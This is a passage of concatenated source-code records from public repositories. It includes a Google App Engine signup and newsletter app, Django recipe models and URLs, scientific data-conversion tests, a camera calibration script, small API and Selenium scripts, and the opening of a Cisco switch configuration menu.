'NewsLetterSubscriptions'\nDRIVER_SIGNUP_DATASTORE = 'DriverSignup'\nADVERTISER_SIGNUP_DATASTORE = 'AdsSignup'\n\nVERIFY_NEWSLETTER = 'newsletter'\nVERIFY_DRIVER = 'driver'\nVERIFY_ADVERTISER = 'advertiser'\n\n# DATA MODELS\n\nclass NewsLetterSubscriptions(ndb.Model):\n email = ndb.StringProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass DriverInfo(ndb.Model):\n name = ndb.StringProperty()\n phone = ndb.StringProperty()\n email = ndb.StringProperty()\n city = ndb.StringProperty()\n state = ndb.StringProperty()\n company = ndb.PickleProperty()\n segments = ndb.IntegerProperty()\n mornings = ndb.IntegerProperty()\n midday = ndb.IntegerProperty()\n afternoon = ndb.IntegerProperty()\n latenight = ndb.IntegerProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass AdvertiserInfo(ndb.Model):\n name = ndb.StringProperty()\n company = ndb.StringProperty()\n phone = ndb.StringProperty()\n email = ndb.StringProperty()\n target_market = ndb.StringProperty()\n territories = ndb.StringProperty()\n other_info = ndb.StringProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass AdCampaign(ndb.Model):\n name = ndb.StringProperty()\n details = ndb.StringProperty()\n link = ndb.StringProperty()\n clicks = ndb.IntegerProperty(default=0)\n start_date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def add_click(cls, key):\n item = cls.query().filter(cls.link==key).order(-cls.start_date).get()\n if item == None:\n return False\n item.clicks = item.clicks + 1\n item.put()\n return True\n \n @classmethod\n def name_exist(cls, key):\n item = cls.query().filter(cls.name==key).order(-cls.start_date).get()\n if item == None:\n return False\n else:\n return True\n \n # REQUEST HANDLERS \n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n template_vaules = {\n 'message_class': 'no_message',\n 'message_text': ' ',\n }\n self.response.out.write(template.render(path, template_vaules))\n \nclass AdvertiserSignup(webapp2.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'templates/ad_signup.html')\n tempate_values = {\n 'message_class': 'no_message',\n 'message_text': ' ',\n }\n self.response.out.write(template.render(path, tempate_values))\n \n def post(self):\n template_vaules = {\n 'message_class': 'good_message',\n 'message_text': 'Please check your inbox for a verification email.',\n }\n error = False\n advertiser = AdvertiserInfo()\n #get variables from POST and validate\n if Validate(self.request.get('name'), ValidationTypes.String, True) is True:\n advertiser.name = self.request.get('name')\n else:\n error = True\n if Validate(self.request.get('company'), ValidationTypes.String, True) is True:\n advertiser.company = self.request.get('company')\n else:\n error = True\n if Validate(self.request.get('phone'), ValidationTypes.String, True) is True:\n advertiser.phone = self.request.get('phone')\n else:\n error = True\n if Validate(self.request.get('email'), ValidationTypes.Email, True) is True:\n advertiser.email = self.request.get('email')\n else:\n error = True\n advertiser.target_market = self.request.get('target_market')\n advertiser.territories = self.request.get('territories')\n advertiser.other_info = self.request.get('other_info')\n \n #Check to see if error was found in validation of data\n if error is True:\n template_vaules['message_class'] = 'bad_message'\n template_vaules['message_text'] = \"Make sure name, email, phone, and company fields are filled out\"\n else:\n #data good = save and email advertiser\n advertiser.verify_id = hashlib.md5(advertiser.email).hexdigest()\n advertiser.put()\n #creat and send the email\n confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_ADVERTISER + advertiser.verify_id\n sender_address = \"No-Reply \"\n subject = \"Confirm your email\"\n body = \"\"\"\nThank you for signing up for the drYve program! Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n mail.send_mail(sender_address, advertiser.email, subject, body)\n \n #send results to user\n path = os.path.join(os.path.dirname(__file__), 'templates/ad_signup.html')\n self.response.out.write(template.render(path, template_vaules))\n \n \nclass DriverSignup(webapp2.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname(__file__), 'templates/signup.html')\n tempate_values = {\n 'message_class': 'no_message',\n 'message_text': ' ',\n }\n self.response.out.write(template.render(path, tempate_values))\n \n def post(self):\n template_vaules = {\n 'message_class': 'good_message',\n 'message_text': 'Please check your inbox for a verification email.',\n }\n error = False\n driver = DriverInfo()\n #get variables from POST and validate\n if Validate(self.request.get('name'), ValidationTypes.String, True) is True:\n driver.name = self.request.get('name')\n else:\n error = True\n if Validate(self.request.get('phone'), ValidationTypes.String, True) is True:\n driver.phone = self.request.get('phone')\n else:\n error = True\n if Validate(self.request.get('email'), ValidationTypes.Email, True) is True:\n driver.email = self.request.get('email')\n else:\n error = True\n if Validate(self.request.get('city'), ValidationTypes.String, True) is True:\n driver.city = self.request.get('city')\n else:\n error = True\n if Validate(self.request.get('state'), ValidationTypes.String, True) is True:\n driver.state = self.request.get('state')\n else:\n error = True\n if Validate(self.request.get('segments'), ValidationTypes.Integer, True) is True:\n driver.segments = int(self.request.get('segments'))\n else:\n error = True\n \n if Validate(self.request.POST.getall('company'), ValidationTypes.Array, True) is True:\n driver.company = self.request.POST.getall('company')\n else:\n error = True\n \n driver.mornings = int(self.request.get('mornings'))\n driver.midday = int(self.request.get('midday'))\n driver.afternoon = int(self.request.get('afternoon'))\n driver.latenight = int(self.request.get('latenight'))\n \n #Check to see if error was found in validation of data\n if error is True:\n template_vaules['message_class'] = 'bad_message'\n template_vaules['message_text'] = \"Make sure all fields are filled out\"\n else:\n #data good = save and email driver\n driver.verify_id = hashlib.md5(driver.email).hexdigest()\n driver.put()\n #creat and send the email\n confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_DRIVER + driver.verify_id\n sender_address = \"No-Reply \"\n subject = \"Confirm your email\"\n body = \"\"\"\nThank you for signing up for the drYve program! Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n mail.send_mail(sender_address, driver.email, subject, body)\n \n #send results to user\n path = os.path.join(os.path.dirname(__file__), 'templates/signup.html')\n self.response.out.write(template.render(path, template_vaules))\n\nclass NewsLetter(webapp2.RequestHandler):\n def post(self):\n template_vaules = {\n 'message_class': 'good_message',\n 'message_text': 'Please check your inbox for a verification email.',\n }\n #gets veriables for database\n newsletter_email = self.request.get('newsletter_email')\n #verify email\n if not mail.is_email_valid(newsletter_email):\n # prompt user to neter a valid address \n template_vaules['message_class'] = 'bad_message'\n template_vaules['message_text'] = \"somethings wrong with the email you entered, please check and try again.\"\n else:\n verify_id = hashlib.md5(newsletter_email).hexdigest()\n #creates and saves database entry\n subscriber = NewsLetterSubscriptions()\n subscriber.email = newsletter_email\n subscriber.verify_id = verify_id\n subscriber.put()\n #create and send verification email\n confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_NEWSLETTER + verify_id\n sender_address = \"No-Reply \"\n subject = \"Confirm your subscription\"\n body = \"\"\"\nThank you for signing up for the drYve newsletter! Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n mail.send_mail(sender_address, newsletter_email, subject, body)\n \n logging.info(confirmation_url)\n \n #let user know about email\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, template_vaules))\n \nclass AdHandler(webapp2.RequestHandler):\n def get(self, campaign_link):\n #add click to campaign\n AdCampaign.add_click(campaign_link)\n #route user to homescreen\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n template_vaules = {\n 'message_class': 'no_message',\n 'message_text': ' ',\n }\n self.response.out.write(template.render(path, template_vaules))\n\nclass VerifyAccount(webapp2.RequestHandler):\n def get(self, verify_type, verify_id):\n #get datastore object based on type\n if verify_type == VERIFY_NEWSLETTER:\n data = NewsLetterSubscriptions.query_verify_id(verify_id).get()\n elif verify_type == VERIFY_DRIVER:\n data = DriverInfo.query_verify_id(verify_id).get()\n elif verify_type == VERIFY_ADVERTISER:\n data = AdvertiserInfo.query_verify_id(verify_id).get()\n else:\n self.response.out.write(\"Sorry not sure were you are trying to go. If you got here from a link please let us know at contact@dryve.io\")\n return\n #Update key in datastore based on id\n data.verified = True\n data.put()\n #inform user of results\n self.response.out.write(\"Thanks %s, your email has been verified!\" % data.email)\n\nclass AdminRedirect(webapp2.RequestHandler):\n def get(self):\n self.redirect(self.request.url+'/')\n\n#Utility Functions\n \nclass ValidationTypes(Enum):\n String = 1\n Integer = 2\n Email = 3\n Array = 4\n \ndef Validate(data, typ, empty=False):\n if typ is ValidationTypes.String:\n if isinstance(data, unicode) == False:\n return False\n if empty is True:\n if data is None or len(data) == 0:\n return False\n elif typ is ValidationTypes.Integer:\n logging.info(data)\n if len(data) is 0:\n return False\n if isinstance(int(data), int) == False:\n return False\n if empty is True:\n if data is None:\n return False\n elif typ is ValidationTypes.Email:\n if mail.is_email_valid(data) == False:\n return False\n if empty is True:\n if data is None or len(data) == 0:\n return False\n elif typ is ValidationTypes.Array:\n if len(data) == 0:\n return False\n \n return True\n \n \n# ROOT\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/signup/advertiser', AdvertiserSignup),\n ('/signup/driver', DriverSignup),\n ('/signup', DriverSignup),\n ('/newsletter', NewsLetter),\n (r'/verify/(\\w+)/(\\w+)', VerifyAccount), #/verify//\n (r'/ad/(\\w+)', AdHandler), #/ad/\n ('/admin', AdminRedirect),\n], debug=False)\n","repo_name":"nicollis/dryve","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74939123026","text":"from django.urls import path\nfrom .views import (\n post_list,\n post_create,\n post_detail,\n # post_update,\n # post_delete,\n)\n\napp_name = 'blog'\nurlpatterns = [\n path('post/', post_list, name='postlist'),\n path('post/create/', post_create),\n path('post//', post_detail, name='postdetail'),\n # path('post//edit/', post_update, name='postupdate'),\n # path('post//delete/', post_delete),\n]\n","repo_name":"belal-bh/CLIC_PUST","sub_path":"src/post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72638627987","text":"# Test conversion to W4M format\n\nimport filecmp\nimport os\nimport shutil\nimport tempfile\nimport unittest\nfrom isatools.convert import isatab2w4m\nfrom isatools.tests import utils\n\n\n# Test presence of data folder\ndef setUpModule():\n if not os.path.exists(utils.DATA_DIR):\n raise FileNotFoundError(\n 'Could not fine test data directory in {0}. Ensure you have cloned '\n 'the ISAdatasets repository using git clone -b tests '\n '--single-branch git@github.com:ISA-tools/ISAdatasets {0}'.format(\n utils.DATA_DIR))\n \n \n# Test class\nclass TestIsatab2w4m(unittest.TestCase):\n\n # Initialize instance resources\n def setUp(self):\n self._tmp_dir = tempfile.mkdtemp()\n\n # Destroy resources\n def tearDown(self):\n shutil.rmtree(self._tmp_dir)\n\n def plain_test(self, study, test_dir):\n # Convert\n isatab2w4m.convert(\n input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir), \n output_dir=self._tmp_dir, \n sample_output='%s-w4m-sample-metadata.tsv', \n variable_output='%s-w4m-variable-metadata.tsv', \n matrix_output='%s-w4m-sample-variable-matrix.tsv')\n # Check files\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n ref_file = os.path.join(utils.TAB_DATA_DIR, test_dir, '.'.join(\n ['-'.join([study, 'w4m', x]), 'tsv']))\n output_file = os.path.join(self._tmp_dir, '.'.join(\n ['-'.join([study, 'w4m', x]), 'tsv']))\n self.assertTrue(os.path.exists(output_file))\n self.assertTrue(filecmp.cmp(output_file, ref_file),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(output_file, ref_file))\n\n # Test MTBLS30\n def test_MTBLS30(self):\n self.plain_test('MTBLS30', 'MTBLS30-w4m')\n\n # Test MTBLS404\n def test_MTBLS404(self):\n self.plain_test('MTBLS404', 'MTBLS404-w4m')\n\n # Test MTBLS338\n def test_MTBLS338(self):\n self.plain_test('MTBLS338', 'MTBLS338-w4m')\n\n # Test NA filtering\n def na_filtering_test(self, study, test_dir, samp_na_filtering=None, \n var_na_filtering=None):\n var_filtering = ','.join(var_na_filtering)\n\n # Set file names\n output_files = dict()\n ref_files = dict()\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n filename = '.'.join(\n ['-'.join([study, 'w4m', var_filtering, x, 'na-filtering']), \n 'tsv'])\n output_files[x] = os.path.join(self._tmp_dir, filename)\n ref_files[x] = os.path.join(utils.TAB_DATA_DIR, test_dir, filename)\n # Convert\n isatab2w4m.convert(input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir),\n output_dir=self._tmp_dir,\n sample_output=output_files['sample-metadata'],\n variable_output=output_files['variable-metadata'],\n matrix_output=output_files['sample-variable-matrix'],\n samp_na_filtering=samp_na_filtering,\n var_na_filtering=var_na_filtering)\n # Check files\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n self.assertTrue(os.path.exists(output_files[x]))\n self.assertTrue(\n filecmp.cmp(output_files[x], ref_files[x]),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(\n output_files[x], ref_files[x]))\n\n # Test MTBLS404 NA filtering\n def test_MTBLS404_na_filtering(self):\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['mass_to_charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['mass_to_charge',\n 'mass_to_charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['database'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['charge', 'database'])\n\n # Test assay selection\n def test_assay_selection(self):\n\n study = 'MTBLS30'\n test_dir = 'MTBLS30-w4m'\n\n for assay in ['a_york_src_GC_mass_spectrometry.txt',\n 'a_york_src_FIA_mass_spectrometry.txt']:\n\n # Convert\n isatab2w4m.convert(\n input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir),\n output_dir=self._tmp_dir,\n sample_output='%s-w4m-sample-metadata-{0}.tsv'.format(assay),\n variable_output='%s-w4m-variable-metadata-{0}.tsv'.format(\n assay),\n matrix_output='%s-w4m-sample-variable-matrix-{0}.tsv'.format(\n assay), assay_filename=assay)\n\n # Check files\n for x in ['sample-metadata', 'variable-metadata',\n 'sample-variable-matrix']:\n ref_file = os.path.join(utils.TAB_DATA_DIR, test_dir, '.'.join(\n ['-'.join([study, 'w4m', x, assay]), 'tsv']))\n output_file = os.path.join(self._tmp_dir, '.'.join(\n ['-'.join([study, 'w4m', x, assay]), 'tsv']))\n self.assertTrue(os.path.exists(output_file))\n self.assertTrue(\n filecmp.cmp(output_file, ref_file),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(output_file, ref_file))\n","repo_name":"ISA-tools/isa-api","sub_path":"tests/convert/test_isatab2w4m.py","file_name":"test_isatab2w4m.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"41471567007","text":"import logging\nimport os\n\nimport numpy as np\n\nfrom offmark.degenerator.de_shuffler import DeShuffler\nfrom offmark.extract.dwt_dct_svd_decoder import DwtDctSvdDecoder\nfrom offmark.video.extractor import Extractor\nfrom offmark.video.frame_reader import FileDecoder\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(name)s %(message)s')\n\n\ndef run():\n this_dir = os.path.dirname(__file__)\n in_file = os.path.join(this_dir, 'out', 'marked.mp4')\n payload = np.array([0, 1, 1, 0, 0, 1, 0, 1])\n print(\"Payload: \", payload)\n\n r = FileDecoder(in_file)\n\n degenerator = DeShuffler(key=0)\n degenerator.set_shape(payload.shape)\n\n frame_extractor = DwtDctSvdDecoder()\n\n video_extractor = Extractor(r, frame_extractor, degenerator)\n video_extractor.start()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"eluv-io/offmark-py","sub_path":"tests/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"15451175555","text":"import numpy as np\nfrom numpy import *\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\n\nW=9\nH=6\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((H*W,3), np.float32)\nobjp[:,:2] = np.mgrid[0:W, 0:H].T.reshape(-1,2)\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d points in real world space\nimgpoints = [] # 2d points in image plane.\n\n# Make a list of calibration images\nimages = glob.glob('*.jpg')\n\n# Step through the list and search for chessboard corners\nfor idx, fname in enumerate(images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (W,H), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n # Draw and display the corners\n cv2.drawChessboardCorners(img, (W,H), corners, ret)\n #write_name = 'corners_found'+str(idx)+'.jpg'\n #cv2.imwrite(write_name, img)\n cv2.imshow('img', img)\n #print('objpoints= ',objpoints)\n #print('imgpoints= ',imgpoints)\n #cv2.waitKey(100)\n\n#cv2.destroyAllWindows()\n\n\nimport pickle\n\n\n# Test undistortion on an image\nimg = cv2.imread('1.jpg')\nimg_size = (img.shape[1], img.shape[0])\n\n# Do camera calibration given object points and image points\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)\n\n\ndst = cv2.undistort(img, mtx, dist, None, mtx)\n#cv2.imwrite('test_undist.jpg',dst)\n\n#print('rvecs= ',rvecs)\n\ntvec=tvecs[0]\n\nrmat, _ =cv2.Rodrigues(rvecs[0])\n\nprint('mtx= ',mtx)\n# print('dist= ',dist)\n\n#=====================求s平均和方差===============================\nfor wpoint,ppoint in zip(objpoints,imgpoints):\n\n #获取内参与外参R,t\n camera_m=np.asmatrix(mtx)\n R=np.asmatrix(rmat)\n t=np.asmatrix(tvec)\n\n #设置空矩阵存储各个点的s\n s_set=np.empty([1,W*H])\n #print(s_set)\n\n for line in range(W*H):\n\n #获取像素坐标与世界坐标\n world=np.asmatrix(wpoint[line,:]).T\n\n ori_pixel=np.asmatrix(ppoint[line]).T\n \n #转换得到[u v 1].T与[X Y 0].T\n world[2,:]=0\n w=world\n\n pixel=np.vstack((ori_pixel,ones([1,1])))\n\n #print(' ',pixel.T,'| ',w.T)\n\n #计算缩放参数s\n s=pixel.I*camera_m*(R*w+t)\n\n s_set[0,line]=s\n\n\n#print('var=',s_set.var())\nvar=s_set.var()\nif var >= 2:\n print('calibration fail')\n\nelse :\n print('calibration succeed')\n \n# 参数写入文件\n camera_para={}\n camera_para[\"camera_m\"] = camera_m\n camera_para[\"R\"]=R\n camera_para[\"t\"]=t\n camera_para[\"s\"]=s_set.mean()\n pickle.dump( camera_para, open( \"camera_para.p\", \"wb\" ) )\n\n#print('ave=',s_set.mean())\n\n# world1=R.I*camera_m.I*s_set.mean()*pixel-R.I*t\n# print('new world=',world1)\n#===================================================================\n","repo_name":"elebebit/project","sub_path":"whole_procedure/step3/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3335932116","text":"import requests\r\nimport config\r\n\r\nurl = \"https://api.yelp.com/v3/businesses/search\"\r\nheader = {\r\n \"Authorization\": \"Bearer \" + config.api_key\r\n}\r\n\r\nparam = {\r\n \"term\" : \"Barber\",\r\n \"location\" : \"NYC\"\r\n}\r\n\r\nresponse = requests.get(url, headers = header, params = param)\r\n\r\nbusinesses = response.json()[\"businesses\"]\r\n\r\nnames = [business[\"name\"] for business in businesses if business[\"rating\"] > 4]\r\n\r\nprint(names)","repo_name":"mauriciogbarros/Python_Material","sub_path":"PyYelp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2197177021","text":"from django.contrib.auth import get_user_model\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.db.models import UniqueConstraint\n\nfrom .validators import validate_amount\n\nUser = get_user_model()\n\n\nclass Tag(models.Model):\n \"\"\"Модель теги.\"\"\"\n\n name = models.CharField(\n max_length=200,\n unique=True,\n verbose_name='Название',\n )\n color = models.CharField(\n max_length=7,\n unique=True,\n verbose_name='Цвет',\n )\n slug = models.SlugField(\n max_length=200,\n unique=True,\n verbose_name='URL',\n )\n\n class Meta:\n verbose_name = 'Тег'\n verbose_name_plural = 'Теги'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Ingredient(models.Model):\n \"\"\"Модель ингридиенты.\"\"\"\n\n name = models.CharField(\n max_length=200,\n verbose_name='Название',\n )\n measurement_unit = models.CharField(\n max_length=200,\n verbose_name='Единица измерения',\n )\n\n class Meta:\n verbose_name = 'Ингридиент'\n verbose_name_plural = 'Ингридиенты'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Recipe(models.Model):\n \"\"\"Модель рецепты.\"\"\"\n\n name = models.CharField(\n max_length=200,\n verbose_name='Название',\n )\n text = models.TextField(verbose_name='Рецепт')\n image = models.ImageField(\n upload_to='recipes/',\n verbose_name='Изображение',\n )\n cooking_time = models.PositiveIntegerField(\n validators=[MinValueValidator(1)],\n verbose_name='Время приготовления мин.',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='recipes',\n )\n tags = models.ManyToManyField(\n Tag,\n through='RecipeTag',\n related_name='recipes',\n verbose_name='Теги',\n )\n ingredients = models.ManyToManyField(\n Ingredient,\n through='RecipeIngredient',\n related_name='recipes',\n verbose_name='Ингридиенты',\n )\n\n class Meta:\n verbose_name = 'Рецепт'\n verbose_name_plural = 'Рецепты'\n ordering = ['-id']\n\n def __str__(self):\n return self.name\n\n\nclass RecipeTag(models.Model):\n \"\"\"Модель для связи тега с рецептами.\"\"\"\n\n tag = models.ForeignKey(\n Tag,\n on_delete=models.PROTECT,\n )\n recipe = models.ForeignKey(\n Recipe,\n on_delete=models.CASCADE,\n )\n\n class Meta:\n verbose_name = 'Рецепт - Тег'\n verbose_name_plural = 'Рецепты - Теги'\n ordering = ['-id']\n constraints = [\n UniqueConstraint(\n fields=['recipe', 'tag'],\n name='unique_recipe_tag',\n )\n ]\n\n def __str__(self):\n return f'{self.recipe.name} - {self.tag.name}'\n\n\nclass RecipeIngredient(models.Model):\n \"\"\"Модель для связи рецепта и ингредиентов.\"\"\"\n\n recipe = models.ForeignKey(\n Recipe,\n on_delete=models.CASCADE,\n verbose_name='Рецепт',\n related_name='recipeingredients',\n )\n ingredient = models.ForeignKey(\n Ingredient,\n on_delete=models.PROTECT,\n verbose_name='Ингридиенты',\n related_name='recipeingredients',\n )\n amount = models.PositiveIntegerField(\n validators=[validate_amount],\n verbose_name='Количество',\n )\n\n class Meta:\n verbose_name = 'Рецепт - Ингредие��т'\n verbose_name_plural = 'Рецепты - Ингредиенты'\n ordering = ['-id']\n constraints = [\n UniqueConstraint(\n fields=['recipe', 'ingredient'],\n name='unique_recipe_ingredient',\n )\n ]\n\n def __str__(self):\n return f'{self.recipe.name} - {self.ingredient.name}'\n\n\nclass Follow(models.Model):\n \"\"\"Модель подписки на авторов.\"\"\"\n\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Пользователь',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='author',\n verbose_name='Автор'\n )\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n ordering = ['user']\n constraints = [\n UniqueConstraint(fields=['user', 'author'], name='unique_follow')\n ]\n\n\nclass ShoppingCart(models.Model):\n \"\"\"Модель список покупок.\"\"\"\n\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='shoppingcarts',\n verbose_name='Пользователь',\n )\n recipe = models.ForeignKey(\n Recipe,\n on_delete=models.CASCADE,\n related_name='shoppingcarts',\n verbose_name='Рецепт',\n )\n\n class Meta:\n verbose_name = 'Список покупок'\n verbose_name_plural = 'Списки покупок'\n ordering = ['user']\n constraints = [\n UniqueConstraint(\n fields=['user', 'recipe'], name='unique_shopingcart'\n )\n ]\n\n\nclass Favorite(models.Model):\n \"\"\"Модель избранные рецепты.\"\"\"\n\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='favorites',\n verbose_name='Пользователь',\n )\n recipe = models.ForeignKey(\n Recipe,\n on_delete=models.CASCADE,\n related_name='favorites',\n verbose_name='Рецепт',\n )\n\n class Meta:\n verbose_name = 'Избранное'\n verbose_name_plural = 'Избранное'\n ordering = ['user']\n constraints = [\n UniqueConstraint(\n fields=['user', 'recipe'], name='unique_favorite'\n )\n ]\n","repo_name":"lllleeenna/foodgram-project-react","sub_path":"backend/foodgram/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72804542225","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nclass checkingdate():\n def checked(self):\n driver=webdriver.Chrome(executable_path=ChromeDriverManager().install())\n # driver=webdriver.Chrome(executable_path=\"F:\\\\python\\\\chromedriver\\\\chromedriver.exe\")\n # driver.get(\"https://www.yatra.com/\")\n driver.get(\"https://flight.yatra.com/air-search-ui/dom2/trigger?type=O&viewName=normal&flexi=0&noOfSegments=1&origin=DEL&originCountry=IN&destination=BOM&destinationCountry=IN&flight_depart_date=10%2F04%2F2022&ADT=1&CHD=0&INF=0&class=Economy&source=fresco-home&unqvaldesktop=258193728031\")\n # driver.find_element(By.XPATH,\"//input[@id='BE_flight_origin_date']\").click()\n driver.maximize_window()\n # wait=WebDriverWait(driver,10)\n # all_date=wait.until(EC.element_to_be_clickable((By.XPATH,\"//div[@id='monthWrapper']//tbody//td[@class!='inActiveTD']\")))\\\n # .find_elements(By.XPATH,\"//div[@id='monthWrapper']//tbody//td[@class!='inActiveTD']\")\n # for date in all_date:\n # if date.get_attribute(\"data-date\") == \"10/05/2022\":\n # date.click()\n # break\n # driver.find_element(By.XPATH,\"//input[@id='BE_flight_flsearch_btn']\").click()\n time.sleep(35)\n pagelength=driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight);var pagelength=document.body.scrollHeight;return document.body.scrollHeight\")\n match=False\n while match==False:\n lastcount=pagelength\n time.sleep(4)\n pagelength=driver.execute_script(\"window.scrollTo(0,document.body.scrollheight);var pagelength=document.body.scrollheigth;return document.body.scrollHeight\")\n if lastcount== pagelength:\n match=True\n\n time.sleep(10)\n\ncsselem=checkingdate()\ncsselem.checked()\n","repo_name":"git-pardeep/test_check","sub_path":"pyselenimun/check_excplicity.py","file_name":"check_excplicity.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38121241950","text":"from sys import exit\nfrom main import ConfigSwitch\nfrom colorama import Fore\n\ndef banner():\n print('''\n ▛▀▀▀▀▀▀▀▜ PyCISCO\n ▌ ▋▋▋▋▋▋▐ by @0xSp3ctra &
\n ▌ ▐ v1.0\n █▙▁▁▁▁▁▟█\n ''')\n\ndef show_menu():\n print(\"\\nPlease chose actions to affect on your device :\\n\")\n print(Fore.LIGHTBLUE_EX + \"┌─[1] \" + Fore.RESET + \"Give a hostname\")\n print(Fore.LIGHTBLUE_EX + \"├─[2] \" + Fore.RESET + \"Create enable password\")\n print(Fore.LIGHTBLUE_EX + \"├─[3] \" + Fore.RESET + \"Create user and password\")\n print(Fore.LIGHTBLUE_EX + \"├─[4] \" + Fore.RESET + \"Create Vlans\")\n print(Fore.LIGHTBLUE_EX + \"├─[5] \" + Fore.RESET + \"Add default gateway\")\n print(Fore.LIGHTBLUE_EX + \"├─[6] \" + Fore.RESET + \"Add ip route\")\n print(Fore.LIGHTBLUE_EX + \"├─[7] \" + Fore.RESET + \"Configure interfaces\")\n print(Fore.LIGHTBLUE_EX + \"│ ├─[1] \" + Fore.RESET + \"Add switchports\")\n print(Fore.LIGHTBLUE_EX + \"│ └─[2] \" + Fore.RESET + \"Change interface speed\")\n print(Fore.LIGHTBLUE_EX + \"└─[8] \" + Fore.RESET + \"Exit pyCISCO and write configuration file\\n\")\n\ninfos_switch = []\nvlan_id_list = []\nConfigSwitch = ConfigSwitch(InfosSwitch=infos_switch, 